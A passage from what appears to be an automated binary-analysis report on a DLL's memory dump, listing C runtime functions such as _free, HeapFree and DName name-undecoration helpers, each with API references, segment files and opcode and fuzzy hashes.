    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
    • String ID: LASm
    • API String ID: 1186856153-592170012
    • Opcode ID: 55d6dd6271dc471a67c8d6676d8f9915979d49ba301e0433bd4ef734ce45225f
    • Instruction ID: 0a46b694307bdde9d70251d1ec3da140f7585d3de15aa9ade43b9ee7ea2fd84f
    • Opcode Fuzzy Hash: 55d6dd6271dc471a67c8d6676d8f9915979d49ba301e0433bd4ef734ce45225f
    • Instruction Fuzzy Hash: 2FC16271914329AFDF0DCFA8D894EEE7BB4EB45304F02445AE215A7A90FB74AA44CB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D534634, Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 301COMMON
    Download Yara Rule
    APIs
    • DName::operator+.LIBCMT ref: 6D53469F
    • DName::operator+.LIBCMT ref: 6D5347D5
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::operator+.LIBCMT ref: 6D534821
    • DName::operator+.LIBCMT ref: 6D534830
    • DName::operator+.LIBCMT ref: 6D53478B
      • Part of subcall function 6D535D7E: DName::operator=.LIBVCRUNTIME ref: 6D535E0D
    • DName::operator+.LIBCMT ref: 6D53495D
    • DName::operator=.LIBVCRUNTIME ref: 6D53499D
    • DName::DName.LIBVCRUNTIME ref: 6D5349B5
    • DName::operator+.LIBCMT ref: 6D5349C4
    • DName::operator+.LIBCMT ref: 6D5349D0
      • Part of subcall function 6D535D7E: Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
    • String ID: <JSm$<JSm
    • API String ID: 1026175760-1629668186
    • Opcode ID: b50c6b22b40f99e4cb8c62ad6b4adbc10181859d390de2fe726db57e0c74b7aa
    • Instruction ID: fbed14f6f2f0e4c33fc141a08a53d55c2028dd7eeda2cc458f26bb3f06c34589
    • Opcode Fuzzy Hash: b50c6b22b40f99e4cb8c62ad6b4adbc10181859d390de2fe726db57e0c74b7aa
    • Instruction Fuzzy Hash: B5C182719043259FDF18CFA8D854BEEBBF4AB4A304F02485EE149A7A80FB759A44CF50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D547F02, Relevance: 25.9, APIs: 17, Instructions: 411COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$___from_strstr_to_strchr
    • String ID:
    • API String ID: 3409252457-0
    • Opcode ID: 6278628fb98b374926f12df492921fd22af373a69130f323fc4a1c7ecdd730e7
    • Instruction ID: c29769bb8b4dab14024271127c66aa7693e3b6f5536a5d948ecc1ab0937b7253
    • Opcode Fuzzy Hash: 6278628fb98b374926f12df492921fd22af373a69130f323fc4a1c7ecdd730e7
    • Instruction Fuzzy Hash: D6D10871D08312AFDF1D9F688844A7D7FB4AF46354F02C96ED61197A80E73199008BD3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54CE1A, Relevance: 22.9, APIs: 15, Instructions: 357COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$Info
    • String ID:
    • API String ID: 2509303402-0
    • Opcode ID: 54e7eb584302ee2b56946d2a72722812020853fb2b1db49c97c63cfa140fb581
    • Instruction ID: 885da833c2539c3d8103b884f19e5ddc7e3b096e6658a161094efb7c72a1e195
    • Opcode Fuzzy Hash: 54e7eb584302ee2b56946d2a72722812020853fb2b1db49c97c63cfa140fb581
    • Instruction Fuzzy Hash: FCD1B071D043469FDB05CFA8C880BFEBBF5BF89304F10842AE955A7A91D770A9458B11
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54C9FC, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
    Download Yara Rule
    APIs
    • ___free_lconv_mon.LIBCMT ref: 6D54CA40
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D295
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2A7
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2B9
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2CB
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2DD
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2EF
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D301
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D313
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D325
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D337
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D349
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D35B
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D36D
    • _free.LIBCMT ref: 6D54CA35
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54CA57
    • _free.LIBCMT ref: 6D54CA6C
    • _free.LIBCMT ref: 6D54CA77
    • _free.LIBCMT ref: 6D54CA99
    • _free.LIBCMT ref: 6D54CAAC
    • _free.LIBCMT ref: 6D54CABA
    • _free.LIBCMT ref: 6D54CAC5
    • _free.LIBCMT ref: 6D54CAFD
    • _free.LIBCMT ref: 6D54CB04
    • _free.LIBCMT ref: 6D54CB21
    • _free.LIBCMT ref: 6D54CB39
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: a0a87c0cb3b7d4b44a8ad6933b02cf1ae69402ca4796a00835ec6a737c55d115
    • Instruction ID: 21733c97084e518ad1d6756651efea1ee20c4a6a157641ffac36630447c3304e
    • Opcode Fuzzy Hash: a0a87c0cb3b7d4b44a8ad6933b02cf1ae69402ca4796a00835ec6a737c55d115
    • Instruction Fuzzy Hash: C13173316083429FEB299B79D844B7673E9EF80314F11C829E16AD7960DF30EE54DB12
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D531B5F, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 338COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: shared_ptr$operator+$Name::operator+Name::operator=
    • String ID: 4CSm
    • API String ID: 1464150960-2386857985
    • Opcode ID: 68316dbe74f6381a599d99d97c60c716da0de11ba082b06113960c756a82d005
    • Instruction ID: 0165755cb5492a48d7545b8f146bc8866501f86050516be1a5a10652e144469b
    • Opcode Fuzzy Hash: 68316dbe74f6381a599d99d97c60c716da0de11ba082b06113960c756a82d005
    • Instruction Fuzzy Hash: 76D176B1C0422A9BCB0DCFA4C584FFEBBB4AF46345F12891AD521A7A50F7349645CFA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D535D7E, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 180COMMON
    Download Yara Rule
    APIs
    • Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    • DName::operator=.LIBVCRUNTIME ref: 6D535E0D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Name::operator=Replicator::operator[]
    • String ID: @$U*Sm$U*Sm$generic-type-$template-parameter-
    • API String ID: 3211817929-2970717911
    • Opcode ID: a570e31433b1edaecd345d9bdb84f06b73ff3eefedb0c4b6e396b610ba4fe758
    • Instruction ID: 207e8859d230f5c46583432988c0e9f64fcb3a1dd6f5ca4dcf2b2a3037d2bf3d
    • Opcode Fuzzy Hash: a570e31433b1edaecd345d9bdb84f06b73ff3eefedb0c4b6e396b610ba4fe758
    • Instruction Fuzzy Hash: F66191B19042299BDF0DCFA5D440BBEBBB8EF5A304F03545AE601A7A90FB749904CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54D376, Relevance: 18.4, APIs: 12, Instructions: 374COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: 5796784e61b55091f981519cce3c56ad0785577a0d795d6cba55c593c9ab5fa7
    • Instruction ID: 892854f96610d1942fb7d075f9c4314c310b04cf9a68eadc1304c0ff86813f96
    • Opcode Fuzzy Hash: 5796784e61b55091f981519cce3c56ad0785577a0d795d6cba55c593c9ab5fa7
    • Instruction Fuzzy Hash: 36C14472E44205AFEB24CFA8CC81FEE77F8AF48B04F154565FA05EB681D6709E418B61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52EEBB, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMON
    Download Yara Rule
    APIs
    • IsInExceptionSpec.LIBVCRUNTIME ref: 6D52EFB6
    • type_info::operator==.LIBVCRUNTIME ref: 6D52EFDD
    • ___TypeMatch.LIBVCRUNTIME ref: 6D52F0E9
    • CatchIt.LIBVCRUNTIME ref: 6D52F13E
    • IsInExceptionSpec.LIBVCRUNTIME ref: 6D52F1C4
    • _UnwindNestedFrames.LIBCMT ref: 6D52F24B
    • CallUnexpected.LIBVCRUNTIME ref: 6D52F266
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 4234981820-393685449
    • Opcode ID: 955e214f94826b8d517620790eedd1f8e4157993b3f4995674f434793c0bff91
    • Instruction ID: 55562c284af35b0015f2ab6a8fbda90b183cf6e7820b804b356f5a47f8800f2f
    • Opcode Fuzzy Hash: 955e214f94826b8d517620790eedd1f8e4157993b3f4995674f434793c0bff91
    • Instruction Fuzzy Hash: 7EC1D031C0420AEFCF0DCFA6E8819AEBBB5BF44314F51455AE811ABA81D731DA59CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D535126, Relevance: 15.3, APIs: 10, Instructions: 253COMMON
    Download Yara Rule
    APIs
    • DName::operator+.LIBCMT ref: 6D5351F2
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5351FD
    • DName::DName.LIBVCRUNTIME ref: 6D53520E
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352B3
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352D0
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352ED
    • DName::operator+.LIBCMT ref: 6D535302
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D535325
    • swprintf.LIBCMT ref: 6D535396
    • DName::operator+.LIBCMT ref: 6D5353ED
      • Part of subcall function 6D53327D: DName::DName.LIBVCRUNTIME ref: 6D5332A1
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
    • String ID:
    • API String ID: 3689813335-0
    • Opcode ID: cd285660ff7b4f4485bde6203bd6c2967a388a462922ca097e032e183d8ae530
    • Instruction ID: 2696ec891d1958cc526c276b4bf5b37881bf817fcf48c6143c4ee3d5e2e1aac9
    • Opcode Fuzzy Hash: cd285660ff7b4f4485bde6203bd6c2967a388a462922ca097e032e183d8ae530
    • Instruction Fuzzy Hash: D781F572D5432A9AEF0DCBA4C845BFE7778AF46305F53541AD210A3C80FB789A04CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D543327, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 6D54333D
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D543349
    • _free.LIBCMT ref: 6D543354
    • _free.LIBCMT ref: 6D54335F
    • _free.LIBCMT ref: 6D54336A
    • _free.LIBCMT ref: 6D543375
    • _free.LIBCMT ref: 6D543380
    • _free.LIBCMT ref: 6D54338B
    • _free.LIBCMT ref: 6D543396
    • _free.LIBCMT ref: 6D5433A4
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 3d20a6dc6d714edb6f9e489376e2caa9aff0290a029907b5a7d65e70384d71c4
    • Instruction ID: a2543751cda50278a5c475b45aa46b3a1f3ea1b69e52c9f9049b6b34d34669f3
    • Opcode Fuzzy Hash: 3d20a6dc6d714edb6f9e489376e2caa9aff0290a029907b5a7d65e70384d71c4
    • Instruction Fuzzy Hash: 8D21B676908108BFCB45DF94C884DEE7BB9AF48344F0185A6E6169B530EB71EB44DB81
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D542126, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 496COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: __aulldvrm
    • String ID: :$f$f$f$p$p$p
    • API String ID: 1302938615-1434680307
    • Opcode ID: 2646751b7fd640333477a9eeb339a3151543b3cfc0cc93f179af0ca8300b2ec6
    • Instruction ID: 42a05122d70d77dc55051bbde9d8cb4f87b0f4742a657b8a175e59242a351e66
    • Opcode Fuzzy Hash: 2646751b7fd640333477a9eeb339a3151543b3cfc0cc93f179af0ca8300b2ec6
    • Instruction Fuzzy Hash: FC026075A042298AEB38CFA5C8546DDB7B6FF42B14FA0C655D428FBA84D7708D84CB13
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D532C25, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 102COMMON
    Download Yara Rule
    APIs
    • DName::DName.LIBVCRUNTIME ref: 6D532C4D
    • DName::DName.LIBVCRUNTIME ref: 6D532C7A
      • Part of subcall function 6D530206: __aulldvrm.LIBCMT ref: 6D530237
    • DName::operator+.LIBCMT ref: 6D532C95
    • DName::DName.LIBVCRUNTIME ref: 6D532CB2
    • DName::DName.LIBVCRUNTIME ref: 6D532CE2
    • DName::DName.LIBVCRUNTIME ref: 6D532CEC
    • DName::DName.LIBVCRUNTIME ref: 6D532D13
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: NameName::$Name::operator+__aulldvrm
    • String ID: |^Sm
    • API String ID: 4069495278-3290091760
    • Opcode ID: 8707af7dae6e8821557766ac76da23fc36a2eb545428e39cf8dc35e19cea8b8a
    • Instruction ID: ddad8e9ba5f29ef7ed9f30353ac7c258c373e38ac6fb69f01fdd0d6216ed0fe4
    • Opcode Fuzzy Hash: 8707af7dae6e8821557766ac76da23fc36a2eb545428e39cf8dc35e19cea8b8a
    • Instruction Fuzzy Hash: 4D31E471848628AACF1DCFADC890BED7BB4FF46314F128849E151A7980F7709946CB90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D55771B, Relevance: 13.8, APIs: 9, Instructions: 301COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 5fa74e730998fbfef68c92422f802955dd9b92352180db27982b708783de8249
    • Instruction ID: 1a7f360229486d089b1fa21ae6b7e2d6bb0b7e81e939b09ae9cda00e5081ef25
    • Opcode Fuzzy Hash: 5fa74e730998fbfef68c92422f802955dd9b92352180db27982b708783de8249
    • Instruction Fuzzy Hash: 4BC10A70D0824A9FEF0BCF99C880BADBBB4BF4A304F01C55AE51597A51C7319A51CF61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54D7CE, Relevance: 13.7, APIs: 9, Instructions: 200COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: 3608cc2aaa05890a61b1256e9cc0e066684c5fd6b5116d675faadab2b0385e6b
    • Instruction ID: e4cc02aa52e48bb11e5ac516726059f627169ffc87f09e439f1b684747f2b6ee
    • Opcode Fuzzy Hash: 3608cc2aaa05890a61b1256e9cc0e066684c5fd6b5116d675faadab2b0385e6b
    • Instruction Fuzzy Hash: 7961E5729143459FDB19CF64C840BBAB7F8EF85710F11C86AEA55EBA80EB709D40CB52
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D545FA0, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 431COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free
    • String ID: *?
    • API String ID: 269201875-2564092906
    • Opcode ID: 9b297a60c3272bff851df2e0d8365968c7271a9b54bf81cddbb9df9daed1b770
    • Instruction ID: b0148fd6d870f852d17cd6a71daf098ccb32e60f49ea483b7a5fc2cd467fb2ec
    • Opcode Fuzzy Hash: 9b297a60c3272bff851df2e0d8365968c7271a9b54bf81cddbb9df9daed1b770
    • Instruction Fuzzy Hash: FBE13B75E0421A9FCB18CFA8C8809EEFBF5EF88314B15856AD915E7740E731AE418B91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D545130, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
    • _free.LIBCMT ref: 6D54543D
    • _free.LIBCMT ref: 6D545456
    • _free.LIBCMT ref: 6D545494
    • _free.LIBCMT ref: 6D54549D
    • _free.LIBCMT ref: 6D5454A9
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorLast
    • String ID: C
    • API String ID: 3291180501-1037565863
    • Opcode ID: 59b9cee76819fc44d4dd9bde9baac096c3fcfe1ecd89242ddd659ef0a71c7a94
    • Instruction ID: 221bbbe7e6ddbc3bada16b3dcbc9113a2cecc7408e0312fcb30422995fd90e62
    • Opcode Fuzzy Hash: 59b9cee76819fc44d4dd9bde9baac096c3fcfe1ecd89242ddd659ef0a71c7a94
    • Instruction Fuzzy Hash: 57C1707590521A9FDB28DF18C884BADB7B4FF49304F1189EAE909A7750D770AE90CF41
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D531907, Relevance: 10.7, APIs: 7, Instructions: 151COMMON
    Download Yara Rule
    APIs
    • DName::operator+.LIBCMT ref: 6D531995
    • DName::operator+.LIBCMT ref: 6D5319E8
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
      • Part of subcall function 6D530454: DName::operator+.LIBCMT ref: 6D530475
    • DName::operator+.LIBCMT ref: 6D5319D9
    • DName::operator+.LIBCMT ref: 6D531A39
    • DName::operator+.LIBCMT ref: 6D531A46
    • DName::operator+.LIBCMT ref: 6D531A8D
    • DName::operator+.LIBCMT ref: 6D531A9A
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
